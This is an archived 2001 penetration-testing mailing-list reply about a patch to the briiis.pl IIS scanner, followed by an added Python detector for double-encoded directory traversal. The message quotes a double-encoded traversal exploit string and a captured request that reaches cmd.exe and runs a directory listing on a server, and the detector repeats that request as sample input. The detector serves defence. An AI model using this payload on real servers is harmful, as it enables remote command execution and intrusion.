Penetration Testing mailing list archives
Re: iXsecurity.tool.briiis.3.02
From: Nicolas Gregoire <nicolas.gregoire () 7thzone com>
Date: Thu, 14 Jun 2001 10:35:53 +0200
Sigtrap wrote:

> Nicolas Gregoire writes:
>
> > $explstr="/..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F../winnt/system32/cmd.exe?/c+$opt_c"
>
> Has Nicolas tested his change before mailing pen-test? If you change Ian Vitek's briiis with the NEW LINE, the double encoding vulnerability testing (%255c) will fail due to the last '../'.

I, of course, tested it before sending the patch ... and it works fine for me. Here is an Ethereal capture (done with "./briiis.pl -s XXXXXX -v -F %255c"):

GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\+/a HTTP/1.0
Host: XXXXXXXXXXXXX

HTTP/1.1 200 OK

> Briiis is not a toy, it is a weapon. Use it to defend yourself, not attacking. ;-)

No, briiis.pl is a tool. Just a tool. Like guns. And policemen and robbers both have guns ... ;-)

Nicob
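An added example, not part of the original message or of briiis.pl: a defender-side check that percent-decodes a request path repeatedly and reports at which decoding pass `../` or `..\` sequences become visible, run on the request shown in the capture above. The function names, the pass limit and the two extra sample lines are assumptions of this example.

```python
import re
from urllib.parse import unquote

TRAVERSAL = re.compile(r"\.\.[\\/]")   # "../" or "..\"
MAX_PASSES = 4                          # assumed limit for this example

def traversal_counts(path):
    """Count traversal sequences in the raw path and after each decoding pass."""
    counts, current = [], path
    for _ in range(MAX_PASSES + 1):
        counts.append(len(TRAVERSAL.findall(current)))
        decoded = unquote(current)
        if decoded == current:          # fixed point: nothing left to decode
            break
        current = decoded
    return counts

def encoding_depth(path):
    """Deepest pass at which new traversal sequences appear (0 = raw, None = none)."""
    depth, seen = None, 0
    for passes, count in enumerate(traversal_counts(path)):
        if count > seen:
            depth, seen = passes, count
    return depth

def scan(request_lines):
    """Return (path, depth) for request lines whose traversal only shows after decoding."""
    hits = []
    for line in request_lines:
        parts = line.split(" ")
        if len(parts) < 2:
            continue
        path = parts[1].split("?", 1)[0]  # check the path, not the query string
        depth = encoding_depth(path)
        if depth:                         # depth >= 1: hidden behind encoding
            hits.append((path, depth))
    return hits

# Constructed sample: the first line mirrors the request in the capture above.
CAPTURED = "/_vti_bin/" + "..%255c" * 8 + "../winnt/system32/cmd.exe"
SAMPLE = [
    "GET " + CAPTURED + "?/c+dir+c:\\+/a HTTP/1.0",
    "GET /docs/a%20b/index.html HTTP/1.0",
    "GET /img/../img/logo.gif HTTP/1.0",
]

if __name__ == "__main__":
    for path, depth in scan(SAMPLE):
        print(depth, path)
```

A filter that inspects only the raw path or a single decoding pass sees just the one trailing `../` in the captured request; the eight `..\` sequences appear only at the second pass.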